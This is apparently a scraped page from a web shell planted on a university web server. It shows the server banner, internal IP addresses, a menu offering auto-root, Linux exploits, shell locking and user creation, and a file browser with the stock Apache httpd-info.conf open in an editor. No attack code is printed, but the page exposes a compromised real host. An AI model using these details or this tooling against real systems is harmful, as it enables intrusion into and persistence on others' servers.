Linux ns1.utparral.edu.mx 6.8.0-79-generic #79~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Fri Aug 15 16:54:53 UTC 2 x86_64
Apache/2.4.58 (Unix) OpenSSL/1.1.1w PHP/8.2.12 mod_perl/2.0.12 Perl/v5.34.1
: 10.10.1.9 | : 10.10.1.254
Cant Read [ /etc/named.conf ]
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
README
+ Create Folder
+ Create File
/
opt /
lampp /
etc /
extra /
[ HOME SHELL ]
Name
Size
Permission
Action
httpd-autoindex.conf
2.8
KB
-rw-r--r--
httpd-dav.conf
1.74
KB
-rw-r--r--
httpd-default.conf
2.87
KB
-rw-r--r--
httpd-info.conf
1.09
KB
-rw-r--r--
httpd-languages.conf
4.96
KB
-rw-r--r--
httpd-manual.conf
1.35
KB
-rw-r--r--
httpd-mpm.conf
4.34
KB
-rw-r--r--
httpd-multilang-errordoc.conf
2.15
KB
-rw-r--r--
httpd-ssl.conf
10.78
KB
-rw-r--r--
httpd-userdir.conf
694
B
-rw-r--r--
httpd-vhosts.conf
1.42
KB
-rw-r--r--
httpd-xampp.conf
1.17
KB
-rw-r--r--
httpd-xampp.conf~
1.33
KB
-rw-r--r--
proxy-html.conf
3.09
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : httpd-info.conf
# # Get information about the requests being processed by the server # and the configuration of the server. # # Required modules: mod_authz_core, mod_authz_host, # mod_info (for the server-info handler), # mod_status (for the server-status handler) # # Allow server status reports generated by mod_status, # with the URL of http://servername/server-status # Change the ".example.com" to match your domain to enable. <Location /server-status> SetHandler server-status Require host .example.com Require ip 127 </Location> # # ExtendedStatus controls whether Apache will generate "full" status # information (ExtendedStatus On) or just basic information (ExtendedStatus # Off) when the "server-status" handler is called. The default is Off. # #ExtendedStatus On # # Allow remote server configuration reports, with the URL of # http://servername/server-info (requires that mod_info.c be loaded). # Change the ".example.com" to match your domain to enable. # <Location /server-info> SetHandler server-info Require host .example.com Require ip 127 </Location>
Close